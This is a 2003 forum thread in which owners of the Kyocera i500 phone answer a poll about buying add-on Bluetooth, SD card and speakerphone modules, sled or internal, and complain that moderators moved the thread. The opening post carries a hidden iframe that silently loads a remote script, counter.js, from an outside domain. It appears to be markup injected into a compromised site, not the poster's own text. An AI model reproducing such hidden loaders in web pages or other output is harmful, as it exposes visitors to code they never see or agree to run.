Poll: What would a small clip-on or internal bluetooth/speakerphone mod be worth to you?

+ Reply to Thread
Page 1 of 2 1 2 LastLast

POLL-- Aftermarket Hardware Upgrades, would you buy?

Okay, this came up in another thread... and I'm curious how many of you out there would be interested in purchasing any hardware enhancements for the the i500, and what they would be worth to you.

In particular, Speakerphone capability, and bluetooth. If you are really intent on something else (MP3 and/or SD card access, etc.) post it here as well.

I will be modding my i500, but have not decided if it is worth offering the mods to others, and if so in what form.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

PHO
    Broward County Florida, "Home of the Hanging Chad"
    Scott, interesting concept.

Glad to see you plan on modding, sounds like fun

i am feeling like the I5 might be my buddy for a while.

the SD/ Mp3 playing ability appeals to me, however, i think the most intriging, would be the Bluetooth.

something else i have been thinking of - a cable to connect the I5 to a Pocket PC (using the i5 as a modem) (bluetooth would of course take care of this)

I have some needs like Streaming Video (anyone read me talking about this?) mp3, and some gaming functions.

I'd get that new PPC in a hearbeat and use bluetooth if it were integrated.

I just read your other post. - if your doing a sled, i might be interested, you know what, i would, with bluetooth, that would solve my ppc issues.

Internally, Ohh, sounds fun, you think you can fit a chip in the phone?

I'm wondering as it relates to your mod's, where are you going to put that stuff, doesn't appear to me that there is much room for anything.

Last edited by PHO; 08-04-2003 at 09:12 PM.
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

"Aaron the Research Dept."

I would definitly purchase a sled type device that would expand the functionality to all of those things...

internal mods I would be scared of.. external ad on mods, I would be all over
    old devices: I300, I330, I500
    current: I730

I would be highly interested in any add on since I am a glutton for spending on my gadgets.

For my opinion I would want bluetooth but only if the drivers were present to use it as a wireless modem, otherwise why bother?

I think a SD slot is also more important, for me more important than anything else. Increasing the memory will allow you to load movies, pictures and mp3 files, just to name a few non-productive ones.

Speakerphone to me is a low priority, but I would still buy it.

well now that I have the right thread for this. pending size, ideally the sled should include bluetooth, an SD card slot and speakerphone (unless the speaker in the back would suffice as one via some creative programming). The ability for multimedia then would be the next step and adding some a/v jacks would be a plus as well. if I was doing a multimedia presentation somewhere, I can't be guaranteed to have bluetooth available. Easy to just take a cable and plug it into a projector. And if I was using it as an MP3 player, having a standard jack is much easier than using an adaptor on the headset jack. plus it would stick out more and be more susceptible to breaking. Of course the cost/benefit ratio would be key to the masses. And the masses also would not be apt to opening up their phone for bluetooth and speaker. Though maybe they would if they could send it in and have it done. Wouldn't be too bad then because you could charge for it with a disclaimer that it voids your warranty.

Ten bucks says whatever sled was created, you'd still be able to fit the phone and sled in that leather case that comes with the phone. It might actually be useful then.

I'd buy a sled for an SD slot.

What kind of form factor are we talking here? Something like the old visorphone add on?
    I gave up on the free ipod. And where'd my smilies go?

th3_plague

I answered "just post a how-to" simply because the good thing about the i500 is it's size, and I'd imagine that any add-on would increase the size, or am I mistaking?

Take a hint from the Empeg guys - post how-to's, then sell the pre-made kits for a price..
    -mark

yes it will increase the size. but it's removable. you only add it when you want the functionality. and I think when the T600 comes out, you'd have an even larger market for the sled. You'd still come in smaller or close to the same size as the T600 (I believe), plus you'd be able to keep the small form factor when you need it. Best of both worlds. Though hopefully we'd have forgotten how much we originally paid for the I5 when we shell out for the sled.

Thumbs up sled yes / disassemble no

Originally posted by SpineDoc
    I think a SD slot is also more important, for me more important than anything else. Increasing the memory will allow you to load movies, pictures and mp3 files, just to name a few non-productive ones.

Speakerphone to me is a low priority, but I would still buy it.

ditto...

also a STEREO audio jack as long as we're wishing!

I would spend money for this but want it to be external and removable. I would only want the extra component volume for certain occasions ie at work for references on media (SD or whatever).

sprint pcs beta tester macmetal666's Avatar
    i guess iam pretty fortunate in having my beta having a speaker phone in it.....but hell yeah and sd slot and a full mp3 stereo with dolby 6.1 200w output would be *****in....
    till then i am stuck dreaming with the uproar......
    my i500 is more obsolete than your ti-99 or apple IIe

I'd love BT, wi-fi and memory.

If it's got slots, they need to be coverable if I'm going to stick in a wi-fi sd chip and not worry about snapping it off.

Don't care about the speakerphone.

Gary

PS - While your at it, I need a way to plug in a PS2 or USB keyboard so I can type on this thing!

Nanotechnology Nerd shadowboxer's Avatar
    I suppose that this poll shows that lots of us are ready to drop a chunk of change for some futher enhancements for the i500. The fact that we spent 600 bucks in the first place for the i500 is a pretty good indicator of our slant in that regard.

I would be very interested in an add-on that would add BT and SD functionality. The speakerphone issue and MP3s are significantly less important to me.

Anyway, Scott sign me up for one!
    Last edited by shadowboxer; 08-05-2003 at 06:59 AM.
    dale1
    my story in phones....
    i300-->i330-->i500-->sprintt650-->ppc6700-->gsmt650-->HTC Universal-->gsmt650-->8525-->back again to my trusty t650

If you could do an external caller ID, I'd caller you a genius.

PHO
    WHY WAS THIS THREAD MOVED -

I appreciate the job administrators do, as i assume volunteers, but, moving this thread was STUPID.

I'm still interested as i slept last night i had dreams of internal mods for BlueTooth and Sled's for SD.

OH, and as long as it doesn't look like this

http://forums.pdabuzz.net/showthread...threadid=47643

Last edited by PHO; 08-05-2003 at 09:54 AM.
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

web art designer developer schleifnet's Avatar
    new orleans (bet you $5 i know where you got dem shoes...)

sd io

so lemme guess you are going to make everyone's dreams come true with an sdio addon with speakerphone built in, this (i think) would be best then cost would be kept down and user can choose to add bt wifi etc etc (camera)

cool, wish i had money for i5 oh well....

wait i know, make mode backwards compatable to i3xx...

i know i know, yeah rt, sure someone doing mod dev in their house is going to do this, but i can hope eh?

thanks, oh and how is the ringer mod for i330 coming, you can refer me to thread if you don't want to answer here....

thanks

schleifnet

Re: sd io

Originally posted by schleifnet
    so lemme guess you are going to make everyone's dreams come true with an sdio addon with speakerphone built in, this (i think) would be best then cost would be kept down and user can choose to add bt wifi etc etc (camera)

cool, wish i had money for i5 oh well....

wait i know, make mode backwards compatable to i3xx...

i know i know, yeah rt, sure someone doing mod dev in their house is going to do this, but i can hope eh?

thanks, oh and how is the ringer mod for i330 coming, you can refer me to thread if you don't want to answer here....

thanks

schleifnet
    Here's a current ringer thread:
    http://www.smartphoneforums.com/foru...1207#post51207

VERY little hope for the i500, the i330 has one hurdle that seems insurmountable right now, but it might just be until I think of a way around it.

As for the h/w mod compatibility with the i330, it's not entirely out of the question. The majority of the interface will be through the port on the phone, which is shared with the i330 and i500 if I go serial, not USB on the h/w side-- which is most likely.

_Scott

I'm also curious about the slacker who moved this thread. Hopefully we can generate enough support so this project goes forward, but we will never amass the support if we are harrassed by the forum Nazis.

yeah. how are you supposed to generate phone specific support with this thread when it's sitting in a generic poll category? dopes.

PHO
    Bump -

can the mods please move this back and make this sticky for a few weeks. now that we know how to turn the phone on and that there is no speaker phone, this is the most interesting possibilities with thsi phone.

www.grtalk.com

I agree